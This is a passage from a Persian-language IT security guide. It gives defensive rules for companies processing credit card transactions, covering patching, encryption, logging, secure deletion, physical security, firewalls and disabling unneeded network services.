‫ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰ ﻋﺒﻮ ﹺﺭ ﻣﻨﺎﺳﺐ( ﺗﺎ ﻣﺒـﺎﺩﺍ ﻣﻬﺎﺟﻤـﺎﻥ ﻧﻴـﺰ ﺍﺯ‬
‫ﺍﺑﺰﺍﺭﻫﺎﻱ ﻣﺸﺎﺑﻪ ﺑﺮﺍﻱ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺳﻴﺴﺘﻢ ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﻛﻨﻨﺪ‪.‬‬
‫ﻗﺎﻋﺪﺓ ‪ .۲۴‬ﺛﺒــﺖ ﮔﺰﺍﺭﺷــﺎﺕ ﺑــﺮﺍﻱ ﻋﻤﻠﻜﺮﺩﻫــﺎ ﻭ ﻛﺎﺭﺑﺮﺩﻫــﺎﻱ‬
‫ﺳﻴﺴﺘﻢ ﺑﺎﻳـﺪ ﺑـﺼﻮﺭﺕ ﻣﻨﻄﻘـﻲ ﻓﻌـﺎﻝ ﺑﺎﺷـﺪ‪ .‬ﺍﻳـﻦ‬
‫ﮔﺰﺍﺭﺷﺎﺕ ﺭﺍ ﻃﺒﻖ ﻳﻚ ﺭﻭﺍﻝ ﻣﺸﺨﺺ ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ‬
‫ﻗﺮﺍﺭ ﺩﻫﻴﺪ‪.‬‬
‫ﺳﻴﺴﺘﻢ ﻓﺎﻳﻞ ‪ NTFS‬ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴﺪ(‬
‫•‬
‫ﻭﺻﻠﻪﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺑﻪﺭﻭﺯ ﺭﺍ ﺭﻭﻱ ﺳﻴـﺴﺘﻢﻋﺎﻣﻠﻬـﺎ‪،‬‬
‫ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﺩﺍﺩﻩ‪ ،‬ﻭ ﺗﻤﺎﻡ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻫـﺎﻱ ﻛـﺎﺭﺑﺮﺩﻱ‬
‫ﺍﻋﻤﺎﻝ ﻛﻨﻴﺪ‪ .‬ﺩﻗﺖ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛـﻪ ﺍﻣـﻦ ﻛـﺮﺩﻥ‬
‫ﻧﮕﺎﺭﺷــﻬﺎﻱ ﺟﺪﻳــﺪ ﺳﻴــﺴﺘﻢﻋﺎﻣﻠﻬــﺎ ﺁﺳــﺎﻧﺘﺮ ﺍﺯ‬
‫ﻧﮕﺎﺭﺷﻬﺎﻱ ﻗﺪﻳﻤﻲﺗﺮ ﺍﺳﺖ‪.‬‬
‫•‬
‫ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺧﻮﺩ ﺍﺯ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻫﺎﻱ ﺿـﺪﻭﻳﺮﻭﺱ‬
‫ﻭ ﻣﻬﺎﺟﻢﻳﺎﺏ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ‪.‬‬
‫•‬
‫ﻱ ﻛﺎﺭﺗﻬــﺎﻱ‬
‫ﻱ ﻓﺎﻳﻠﻬــﺎﻱ ﺩﺍﺩﻩﺍ ﹺ‬
‫ﺑــﺮﺍﻱ ﺭﻣﺰﮔــﺬﺍﺭ ﹺ‬
‫ﺍﻋﺘﺒﺎﺭﻱ ﺑﺎﻳﺪ ﺍﺯ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﭘﻴﺸﺮﻓﺘﺔ ﺭﻣﺰﻧﮕﺎﺭﻱ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺷﻮﺩ‪.‬‬
‫•‬
‫ﺑﺎﻳﺪ ﻣﺮﺍﻗﺐ ﺑﻮﺩ ﻛـﻪ ﻓﺎﻳﻠﻬـﺎﻱ ﻣـﻮﻗﺘﻲ‪ ٢٠٠‬ﺷـﺎﻣﻞ‬
‫ﺍﻃﻼﻋﺎﺕ ﺭﻣﺰﻧﺸﺪﻩ ﻧﺒﺎﺷﻨﺪ‪ .‬ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﻧﻴﺎﺯﻱ ﺑﻪ‬
‫ﺁﻧﻬﺎ ﻧﺒﺎﺷﺪ ﻧﻪﺗﻨﻬﺎ ﺑﺎﻳﺪ ﺍﺯ ﺭﻭﻱ ﺳﻴﺴﺘﻢ ﭘﺎﻙ ﺷﻮﻧﺪ‪،‬‬
‫ﺑﻠﻜﻪ ﺑﺎﻳﺪ ﺁﻧﻬﺎ ﺭﺍ ﻃﻮﺭﻱ ﺣﺬﻑ ﻛﺮﺩ ﻛﻪ ﺩﻳﮕﺮ ﻗﺎﺑﻞ‬
‫ﺑﺎﺯﻳﺎﺑﻲ ﻫﻢ ﻧﺒﺎﺷﻨﺪ‪.‬‬
‫•‬
‫ﺗﻤﺎﻡ ﺩﺳﺘﺮﺳـﻴﻬﺎ ﺑـﻪ ﻓﺎﻳﻠﻬـﺎﻱ ﺣـﺴﺎﺱ ﺑﺎﻳـﺪ ﺩﺭ‬
‫ﻓﺎﻳﻠﻬﺎﻱ ﮔﺰﺍﺭﺵ ﺛﺒﺖ ﺷﻮﻧﺪ‪ ،‬ﻭ ﺍﻳﻦ ﮔﺰﺍﺭﺷﺎﺕ ﺑﺎﻳﺪ‬
‫ﺩﺭ ﻓﻮﺍﺻﻞ ﺯﻣﺎﻧﻲ ﻣﻌﻴﻦ ﺗﺤﺖ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﮔﻴﺮﻧـﺪ‬
‫ﺗﺎ ﻣﺸﻜﻼﺕ ﻳﺎ ﺧﻄﺎﻫﻬﺎﻱ ﺑـﺎﻟﻘﻮﻩ ﺁﺷـﻜﺎﺭ ﮔﺮﺩﻧـﺪ‪.‬‬
‫ﺍﻳﻦ ﮔﺰﺍﺭﺷﻬﺎ ﺑﺎﻳﺪ ﺩﺭ ﺩﻭ ﻓﺎﻳﻞ ﺛﺒﺘﻬﺎ ﻧﻮﺷﺘﻪ ﺷﻮﻧﺪ ﻭ‬
‫ﺍﺯ ﻧﺴﺨﺔ ﺩﻭﻡ ﺑﺎﻳﺪ ﺩﺭ ﺟﺎﻳﻲ ﻏﻴﺮ ﺍﺯ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﻛـﻪ‬
‫ﺑﺮﻧﺎﻣﺔ ﻛﺎﺭﺑﺮﺩﻱ ﺭﻭﻱ ﺁﻥ ﺍﺟﺮﺍ ﻣﻲﺷﻮﺩ ﻧﮕﻬـﺪﺍﺭﻱ‬
‫ﻛﺮﺩ‪.‬‬
‫•‬
‫ﻲ ﻫـﺸﺪﺍﺭﻫﺎﻱ‬
‫ﻫﻤﻮﺍﺭﻩ ﮔﺮﻭﻫﻬﺎﻱ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜ ﹺ‬
‫ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ ﺗﺎ ﺍﮔﺮ ﻧﻘﻄﻪﺿﻌﻔﻲ ﮔﺰﺍﺭﺵ‬
‫ﺷﺪﻩ ﺑﻮﺩ ﻛﻪ ﺍﺣﻴﺎﻧﹰﺎ ﻣﺮﺑﻮﻁ ﺑﻪ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﻣﻲﺷﺪ‪،‬‬
‫ﺳﺮﻳﻌﹰﺎ ﺍﺯ ﺁﻥ ﻣﻄﻠﻊ ﺷﻮﻳﺪ‪.‬‬
‫•‬
‫ﺩﺭﺻﻮﺭﺕ ﻭﻗﻮﻉ ﺣﻤﻠﻪ‪ ،‬ﺗﻤﺎﻡ ﺍﺣﺘﻴﺎﻃﻬـﺎﻱ ﻣﻤﻜـﻦ‬
‫ﺑﺮﺍﻱ ﻛﺎﻫﺶ ﻣﺨﺎﻃﺮﻩ ﺭﺍ ﻣﺪ ﻧﻈﺮ ﻗﺮﺍﺭ ﺩﻫﻴﺪ‪.‬‬
‫ﻓﻬﺮﺳﺖ ﺷﺮﻛﺘﻬﺎﻱ ﺍﺳﺘﻔﺎﺩﻩﻛﻨﻨﺪﻩ ﺍﺯ‬
‫ﺗﺮﺍﻛﻨﺸﻬﺎﻱ ﻛﺎﺭﺗﻬﺎﻱ ﺍﻋﺘﺒﺎﺭﻱ‬
‫ﺍﻟﻒ( ﺍﮔﺮ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﻣﺘﺼﻞ ﺑﻪ ﺷﺒﻜﻪ ﻧﻴﺴﺖ‬
‫•‬
‫ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺷﺮﻛﺖ ﺑﺎﻳﺪ ﺩﺭ ﻣﺤﻠﻲ ﻧﮕﻬﺪﺍﺭﻱ ﺷـﻮﻧﺪ‬
‫ﻛﻪ ﺍﺯ ﻧﻈﺮ ﻓﻴﺰﻳﻜﻲ ﺍﻳﻤﻦ ﺑﺎﺷﺪ‪.‬‬
‫•‬
‫ﺑﺮﺍﻱ ﺑﺎﺯ ﻛﺮﺩﻥ ﻗﻔـﻞ ﺭﺍﻳﺎﻧـﻪ ﺑﺎﻳـﺪ ﺍﺯ ﺭﻣـﺰ ﻋﺒـﻮﺭ‬
‫ﻞ ﺍﻓـﺮﺍﺩ‬
‫ﻣﺴﺘﺤﻜﻤﻲ ﺍﺳﺘﻔﺎﺩﻩ ﺷـﺪﻩ ﺑﺎﺷـﺪ ﻭ ﺣـﺪﺍﻗ ﹺ‬
‫ﻣﻤﻜﻦ ﺑﺎﻳﺪ ﺁﻧﺮﺍ ﺑﺪﺍﻧﻨﺪ‪.‬‬
‫•‬
‫ﺩﺳﺘﺮﺳﻲ ﻓﻴﺰﻳﻜﻲ ﻓﺮﺩ ﺭﺍ ﻗﺎﺩﺭ ﻣﻲﻛﻨﺪ ﻛـﻪ ﺑﺘﻮﺍﻧـﺪ‬
‫ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺭﺍ ﺑﻪ ﺳﺮﻗﺖ ﺑﺒﺮﺩ؛ ﺑﻨﺎﺑﺮﺍﻳﻦ ﺍﻣﻨﻴـﺖ‬
‫ﻓﻴﺰﻳﻜﻲ ﺑﺴﻴﺎﺭ ﻣﻬﻢ ﺍﺳﺖ‪ .‬ﺍﮔﺮ ﺑﻪ ﺭﺍﻳﺎﻧﻪ ﺩﺳﺘﺮﺳﻲ‬
‫ﻓﻴﺰﻳﻜﻲ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﻴﺪ ﻣـﻲﺗﻮﺍﻧﻴـﺪ ﺁﻧـﺮﺍ ﺑـﺎ ﻳـﻚ‬
‫ﺩﻳﺴﻚ ﻓﻼﭘﻲ ﻳﺎ ﺩﻳﺴﻚ ﻓﺸﺮﺩﻩ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﻣﺠﺪﺩ‬
‫ﻛﻨﻴــﺪ ﻭ ﺑﺪﻳﻨﻮﺳــﻴﻠﻪ ﺗﻤــﺎﻡ ﺳــﺪﻫﺎﻱ ﺍﻣﻨﻴﺘــﻲ‬
‫ﺳﻴــﺴﺘﻢﻋﺎﻣــﻞ ﻭ ﺑﺮﻧﺎﻣــﻪﻫــﺎﻱ ﻛــﺎﺭﺑﺮﺩﻱ )ﺑﺠــﺰ‬
‫ﺭﻣﺰﻧﮕﺎﺭﻱ( ﺭﺍ ﺩﻭﺭ ﺑﺰﻧﻴﺪ‪.‬‬
‫•‬
‫ﺟﻬﺖ ﻣﺤﺪﻭﺩ ﻛﺮﺩﻥ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺩﺍﺩﻩﻫﺎ ﺑﺎﻳـﺪ ﺩﺭ‬
‫ﺳﻄﺢ ﻓﺎﻳﻠﻬﺎ ﺍﺯ ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺍﺳﺘﻔﺎﺩﻩ ﺷﻮﺩ‪.‬‬
‫‪200 Temporary Files‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‬
‫ﻗﺎﻋﺪﺓ ‪ .۲۵‬ﻫﺮ ﺍﺯ ﭼﻨﺪﮔﺎﻩ ﺗـﺪﺍﺑﻴﺮ ﺍﻣﻨﻴﺘـﻲ ﺧـﻮﺩ ﺭﺍ ﺑـﺎ ﺭﻭﺷـﻬﺎ ﻭ‬
‫ﺁﺯﻣﻮﻧﻬﺎﻱ ﻣﺨﺘﻠﻒ ﻣﻮﺭﺩ ﺑﺎﺯﺑﻴﻨﻲ ﻗﺮﺍﺭ ﺩﻫﻴﺪ ﺗﺎ ﺑﺘﻮﺍﻧﻴﺪ‬
‫ﺍﺷﻜﺎﻻﺕ ﺍﺣﺘﻤﺎﻟﻲ ﺭﺍ ﭘـﻴﺶ ﺍﺯ ﻭﻗـﻮﻉ ﺳـﺎﻧﺤﻪ ﺭﻓـﻊ‬
‫ﻛﻨﻴﺪ‪.‬‬
‫ﻣﺎﺷﻴﻨﻬﺎﻱ ‪ Windows‬ﺑﻪ ﺍﻳـﻦ ﻣﻌﻨـﻲ ﺍﺳـﺖ ﻛـﻪ ﺑﺎﻳـﺪ ﺍﺯ‬
‫‪٢٠٨‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫•‬
‫ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨﻴـﺪ ﻛـﻪ ﺗﻤـﺎﻣﻲ ﻛﺎﺭﻣﻨـﺪﺍﻥ ‪-‬‬
‫ﻣﺨﺼﻮﺻﹰﺎ ﻣﺪﻳﺮﺍﻥ ﺍﺭﺷﺪ ‪ -‬ﺑﺎﻭﺭ ﺩﺍﺭﻧﺪ ﻛـﻪ ﺍﻣﻨﻴـﺖ‬
‫ﺑﺮﺍﻱ ﺳﺎﺯﻣﺎﻥ ﺑﺴﻴﺎﺭ ﺍﻫﻤﻴﺖ ﺩﺍﺭﺩ‪.‬‬
‫•‬
‫ﺍﮔﺮ ﺍﻃﻼﻋﺎﺗﻲ ﻣﺜﻞ ﺩﺍﺩﻩ ﻫـﺎﻱ ﻛـﺎﺭﺕ ﺍﻋﺘﺒـﺎﺭﻱ ﻭ‬
‫ﺩﻳﮕﺮ ﺩﺍﺩﻩﻫﺎﻱ ﻣـﺎﻟﻲ ﺭﺍ ﺍﺯ ﺭﻭﻱ ﺩﻳـﺴﻚ ﺳـﺨﺖ‬
‫ﺣﺬﻑ ﻣﻲ ﻛﻨﻴﺪ‪ ،‬ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛﻪ ﺁﻥ ﺩﺍﺩﻩ ﺩﻳﮕـﺮ‬
‫ﺑﻪ ﻫﻴﭽﻮﺟﻪ ﻗﺎﺑﻞ ﺑﺎﺯﻳﺎﺑﻲ ﻧﺨﻮﺍﻫﺪ ﺑﻮﺩ‪ .‬ﺍﻳﻦ ﻓﺮﺁﻳﻨﺪ‬
‫ﻓﺮﺍﺗﺮ ﺍﺯ ﭘﺎﻙ ﻛﺮﺩﻥ ﺳﺎﺩﺓ ﻓﺎﻳﻠﻬـﺎ ﺍﺳـﺖ‪ .‬ﭼﻨﺎﻧﭽـﻪ‬
‫ﻧﻤﻲﺩﺍﻧﻴﺪ ﻛﻪ ﺩﺍﺩﻩﻫﺎ ﺭﺍ ﭼﻄـﻮﺭ ﺑـﺼﻮﺭﺕ ﻛﺎﻣـﻞ ﺍﺯ‬
‫ﺑﻴﻦ ﺑﺒﺮﻳﺪ‪ ،‬ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﺍﺯ ﺍﻓﺮﺍﺩ ﻣﺘﺨـﺼﺺ‬
‫ﻛﻤﻚ ﺑﮕﻴﺮﻳﺪ‪.‬‬
‫•‬
‫ﺩﺭ ﻓﻮﺍﺻﻞ ﻣﻨﻈﻢ ﺯﻣـﺎﻧﻲ ﻧـﺴﺨﺔ ﭘـﺸﺘﻴﺒﺎﻥ ﺗﻬﻴـﻪ‬
‫ﻛﻨﻴﺪ ﻭ ﺍﺯ ﺍﻳﻤﻨﻲ ﻧﺴﺨﻪﻫﺎﻳﻲ ﻛﻪ ﺣﺎﻭﻱ ﺍﻃﻼﻋـﺎﺕ‬
‫ﻛﺎﺭﺕ ﺍﻋﺘﺒﺎﺭﻱ ﻫﺴﺘﻨﺪ ﻛﺴﺐ ﺍﻃﻤﻴﻨﺎﻥ ﻛﻨﻴﺪ‪.‬‬
‫•‬
‫ﺑﺎ ﺍﻧﺘـﺸﺎﺭ ﻳـﻚ "ﺳﻴﺎﺳـﺖ ﺣـﺮﻳﻢ ﺧـﺼﻮﺻﻲ" ﺑـﻪ‬
‫ﻛﺎﺭﺑﺮﺍﻥ ﺍﻋﻼﻡ ﻛﻨﻴﺪ ﭼﻪ ﺩﺍﺩﻩ ﻫﺎﻳﻲ ﺭﺍ ﺫﺧﻴـﺮﻩ ﻭ ﺍﺯ‬
‫ﺁﻥ ﺑﺮﺍﻱ ﭼـﻪ ﻣﻨﻈـﻮﺭﻱ ﺍﺳـﺘﻔﺎﺩﻩ ﻣـﻲﻧﻤﺎﻳﻴـﺪ‪ ،‬ﻭ‬
‫ﭼﮕﻮﻧﻪ ﺁﻧﺮﺍ ﻣﻮﺭﺩ ﻣﺤﺎﻓﻈﺖ ﻗﺮﺍﺭ ﻣﻲﺩﻫﻴﺪ )ﻣﻲﺗﻮﺍﻧﻴﺪ‬
‫ﭼﮕﻮﻧﮕﻲ ﺣﻔﺎﻇﺖ ﺭﺍ ﺑﺼﻮﺭﺕ ﻏﻴﺮﻣﺴﺘﻘﻴﻢ ﻭ ﻣـﺒﻬﻢ ﺗﻮﺿـﻴﺢ‬
‫ﺩﻫﻴﺪ(‪.‬‬
‫•‬
‫ﺍﮔﺮ ﺑﺮﺍﻱ ﺑﺮﺩﺍﺷﺖ ﺍﺯ ﻛﺎﺭﺗﻬـﺎﻱ ﺍﻋﺘﺒـﺎﺭﻱ‪ ،‬ﺍﻋﺘﺒـﺎﺭ‬
‫ﺁﻧﻬﺎ ﺭﺍ ﺑﺼﻮﺭﺕ ﺑﺮﺧﻂ ﺍﺭﺯﻳﺎﺑﻲ ﻣﻲﻛﻨﻴـﺪ ﺍﻃﻤﻴﻨـﺎﻥ‬
‫ﻲ ﻣـﻮﺭﺩ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ‬
‫ﺣﺎﺻﻞ ﻛﻨﻴﺪ ﻛﻪ ﺧﻂ ﺍﺭﺗﺒـﺎﻃ ﹺ‬
‫ﺍﻣﻨﻴﺖ ﻻﺯﻡ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺍﺳـﺖ‪ .‬ﺍﮔـﺮ ﺍﺯ ﻳـﻚ ﻣـﻮﺩﻡ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻧﻤﺎﻳﻴـﺪ‪ ،‬ﻣﻄﻤـﺌﻦ ﺷـﻮﻳﻦ ﻛـﻪ ﺍﻣﻜـﺎﻥ‬
‫ﺑﺮﻗﺮﺍﺭﻱ ﺗﻤﺎﺱ ﺍﺯ ﺑﻴﺮﻭﻥ ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ‪.‬‬
‫•‬
‫ﺍﮔﺮ ﺳﻮﺍﺑﻘﻲ ﺷﺎﻣﻞ ﺩﺍﺩﻩﻫﺎﻱ ﻛﺎﺭﺕ ﺍﻋﺘﺒﺎﺭﻱ ﺭﺍ ﺑـﻪ‬
‫ﭼﺎﭖ ﻣﻲﺭﺳﺎﻧﻴﺪ‪ ،‬ﺍﺯ ﻟﺤﺎﻅ ﻓﻴﺰﻳﻜﻲ ﻧﻴﺰ ﺑﺎﻳﺪ ﺍﻣﻨﻴﺖ‬
‫ﺁﻧﻬﺎ ﺭﺍ ﺗﺄﻣﻴﻦ ﻛﻨﻴﺪ ﻭ ﺑﻼﻓﺎﺻﻠﻪ ﭘﺲ ﺍﺯ ﺍﻳﻨﻜﻪ ﺩﻳﮕﺮ‬
‫ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﻧﺒﻮﺩﻧﺪ ﺁﻧﻬﺎ ﺭﺍ ﺑﺎ ﺩﺳﺘﮕﺎﻩ ﻛﺎﻏﺬﺧﺮﺩﻛﻦ ﺍﺯ‬
‫ﺑﻴﻦ ﺑﺒﺮﻳﺪ‪.‬‬
‫•‬
‫ﺍﺯ ﻣﻨﺎﺑﻊ ﻣﻌﺘﺒﺮ‪ ،‬ﭼﻨﺪ ﻛﺘﺎﺏ ﺑﻪﺭﻭﺯ ﺩﺭ ﺯﻣﻴﻨﺔ ﺍﻣﻨﻴـﺖ‬
‫ﺗﺠﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﺨﺮﻳﺪ‪ ،‬ﺁﻧﻬﺎ ﺭﺍ ﻣـﻮﺭﺩ ﻣﻄﺎﻟﻌـﻪ‬
‫ﻗــﺮﺍﺭ ﺩﻫﻴــﺪ‪ ،‬ﻭ ﺗﻮﺻــﻴﻪﻫﺎﻳــﺸﺎﻥ ﺭﺍ ﺩﻧﺒــﺎﻝ ﻛﻨﻴــﺪ‪.‬‬
‫ﺍﻧﺘــﺸﺎﺭﺍﺕ ﺍﻭﺭﻳﻠــﻲ ﻭ ﺷــﺮﻛﺎ‪ ،٢٠١‬ﺟــﺎﻥ ﻭﺍﻳﻠــﻲ ﻭ‬
‫‪201 O'Reilly & Associates‬‬
‫ﭘﺴﺮﺍﻥ‪ ،٢٠٢‬ﻭ ﻣﻚ ﮔﺮﻭﻫﻴﻞ‪ ٢٠٣‬ﻛﺘﺎﺑﻬﺎﻱ ﺧﻮﺑﻲ ﺩﺭ‬
‫ﺑﺎﺏ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﻣﻨﺘـﺸﺮ ﻛـﺮﺩﻩﺍﻧـﺪ‪.‬‬
‫ﻗﻴﻤﺖ ﺍﻳﻦ ﻛﺘﺎﺑﻬﺎ ﺑﺴﺘﻪ ﺑـﻪ ﻣﺤـﻞ ﺯﻧـﺪﮔﻲ ﺷـﻤﺎ‬
‫ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﺘﻔﺎﻭﺕ ﺑﺎﺷﺪ‪ ،‬ﺍﻣﺎ ﺑﻪ ﻫﺮ ﺣﺎﻝ ﺧﺮﻳـﺪ‬
‫ﻭ ﺍﺳــﺘﻔﺎﺩﺓ ﻣــﺆﺛﺮ ﺍﺯ ﺁﻧﻬــﺎ ﺳــﺮﻣﺎﻳﻪﮔــﺬﺍﺭﻱ ﺑــﺴﻴﺎﺭ‬
‫ﻣﻔﻴﺪﻱ ﺑﻪ ﺣﺴﺎﺏ ﻣﻲﺁﻳﺪ‪.‬‬
‫ﺏ( ﺍﮔﺮ ﻻﺯﻡ ﺍﺳﺖ ﻛﻪ ﺭﺍﻳﺎﻧﻪ ﺍﺯ ﺷﺒﻜﺔ ﺩﺍﺧﻠﻲ ﻗﺎﺑـﻞ‬
‫ﺩﺳﺘﺮﺱ ﺑﺎﺷﺪ‪:‬‬
‫•‬
‫ﺗﻤﺎﻡ ﻧﻜﺎﺗﻲ ﻛﻪ ﺩﺭ ﻣﻮﺭﺩ ﻗﺒﻠﻲ ﮔﻔﺘﻪ ﺷـﺪ‪ ،‬ﺑﻌـﻼﻭﺓ‬
‫ﻧﻜﺎﺕ ﺯﻳﺮ‪:‬‬
‫•‬
‫ﻳﻚ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﻧﺼﺐ ﻛﻨﻴﺪ ﺗـﺎ ﻣﻄﻤـﺌﻦ ﺷـﻮﻳﺪ‬
‫ﺗﻨﻬﺎ ﻛﺎﺭﺑﺮﺍﻥ ﻭ ﺗﺮﺍﻛﻨﺸﻬﺎﻱ ﻣﺠﺎﺯ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺑـﻪ‬
‫ﺭﺍﻳﺎﻧــﻪ ﺩﺳﺘﺮﺳــﻲ ﺩﺍﺷــﺘﻪ ﺑﺎﺷــﻨﺪ ﻭ ﺍﺯ ﺩﺳﺘﺮﺳــﻲ‬
‫ﻋﻤﻮﻣﻲ ﺑﻪ ﺁﻥ ﺟﻠﻮﮔﻴﺮﻱ ﺧﻮﺍﻫﺪ ﺷﺪ‪.‬‬
‫•‬
‫ﻭﺻﻠﻪﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺑﻪﺭﻭﺯ ﺭﺍ ﺭﻭﻱ ﺗﻤـﺎﻡ ﺗﺠﻬﻴـﺰﺍﺕ‬
‫ﺷﺒﻜﻪ )ﻣـﺴﻴﺮﻳﺎﺑﻬﺎ‪ ،‬ﺩﻳـﻮﺍﺭﻩﻫـﺎﻱ ﺁﺗـﺶ‪ ،‬ﺳـﻮﺋﻴﭽﻬﺎ‪ ،‬ﻭ ‪(...‬‬
‫ﻧﺼﺐ ﻛﻨﻴﺪ‪.‬‬
‫•‬
‫ﺑﺮﺍﻱ ﻛﻠﻴﺔ ﭘﻴﺎﻣﻬﺎﻱ ﻣﺮﺑﻮﻁ ﺑﻪ ﻛﺎﺭﺕ ﺍﻋﺘﺒﺎﺭﻱ ﻛـﻪ‬
‫ﺭﻭﻱ ﺧﻂ ﻣﻨﺘﻘﻞ ﻣﻲﺷﻮﻧﺪ ﺍﺯ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﻛﻨﻴﺪ‪.‬‬
‫•‬
‫ﻫﻤــﺔ ﺧــﺪﻣﺎﺕ ﺷــﺒﻜﻪﺍﻱ ﻏﻴﺮﺿــﺮﻭﺭﻱ )ﻣﺜــﻞ‬
‫ﺳــﺮﻭﻳﺲﺩﻫﻨــﺪﺓ ‪ ،Web‬ﻓﺮﺍﺧــﻮﺍﻧﻲ ﺗــﺎﺑﻊ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ‪ ،٢٠٤‬ﻭ‬
‫ﭘﺮﻭﺗﻜﻞ ﺍﻧﺘﻘﺎﻝ ﻓﺎﻳﻞ‪ (٢٠٥‬ﺭﺍ ﻏﻴﺮﻓﻌﺎﻝ ﻛﻨﻴﺪ‪.‬‬
‫ﺝ( ﺍﮔﺮ ﺍﻃﻼﻋﺎﺕ ﻛﺎﺭﺕ ﺍﻋﺘﺒﺎﺭﻱ ﺍﺯ ﻃﺮﻳـﻖ ﺷـﺒﻜﺔ‬
‫ﺟﻬﺎﻧﻲ ﻭﺏ ﻗﺎﺑﻞ ﺩﺳﺘﺮﺳﻲ ﺍﺳﺖ‪:‬‬
‫•‬
‫ﺗﻤﺎﻡ ﻧﻜﺎﺗﻲ ﻛﻪ ﺩﺭ ﻣﻮﺭﺩ ﻗﺒﻠﻲ ﮔﻔﺘﻪ ﺷـﺪ‪ ،‬ﺑﻌـﻼﻭﺓ‬
‫ﻧﻜﺎﺕ ﺯﻳﺮ‪:‬‬
‫•‬
‫ﺍﻃﻼﻋــﺎﺕ ﻣﺮﺑــﻮﻁ ﺑــﻪ ﻛــﺎﺭﺕ ﺍﻋﺘﺒــﺎﺭﻱ ﺭﺍ ﺩﺭ‬
‫ﺭﺍﻳﺎﻧﻪﻫﺎﻳﻲ ﻛﻪ ﺍﺯ ﻃﺮﻳﻖ ﺍﻳﻨﺘﺮﻧﺖ ﻗﺎﺑـﻞ ﺩﺳﺘﺮﺳـﻲ‬
‫ﻫﺴﺘﻨﺪ ﻗـﺮﺍﺭ ﻧﺪﻫﻴـﺪ‪ .‬ﺩﺍﺩﻩﻫـﺎ ﺭﺍ ﺭﻭﻱ ﺩﺳـﺘﮕﺎﻫﻲ‬
‫ﺩﻳﮕﺮ ﻭ ﭘﺸﺖ ﺩﻳﻮﺍﺭﺓ ﺁﺗـﺶ ﻗـﺮﺍﺭ ﺩﻫﻴـﺪ ﻭ ﺑـﺮﺍﻱ‬
‫‪John Wiley and Sons‬‬
‫‪Osborne / McGraw-Hill‬‬
‫)‪Remote Procedure Call (RPC‬‬
‫)‪File Transfer Protocol (FTP‬‬
‫‪202‬‬
‫‪203‬‬
‫‪204‬‬
‫‪205‬‬
‫‪٢٠٩‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬
‫ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺁﻥ ﺍﺯ ﻓﺮﺍﺧـﻮﺍﻧﻲ ﺗـﺎﺑﻊ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ﻳـﺎ‬
‫ﺳﺎﻳﺮ ﺭﻭﺷﻬﺎﻱ ﺍﺭﺗﺒﺎﻃﻲ ﺑﻪ ﻫﻤـﺮﺍﻩ ﻳـﻚ ﺳﻴـﺴﺘﻢ‬
‫ﻏﺮﺑﺎﻝﺳﺎﺯ ﺧﻮﺏ ﺩﺭ ﺳﻄﺢ ﺩﻳـﻮﺍﺭﺓ ﺁﺗـﺶ ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﻛﻨﻴﺪ‪.‬‬
‫ﺩ(‬
‫•‬
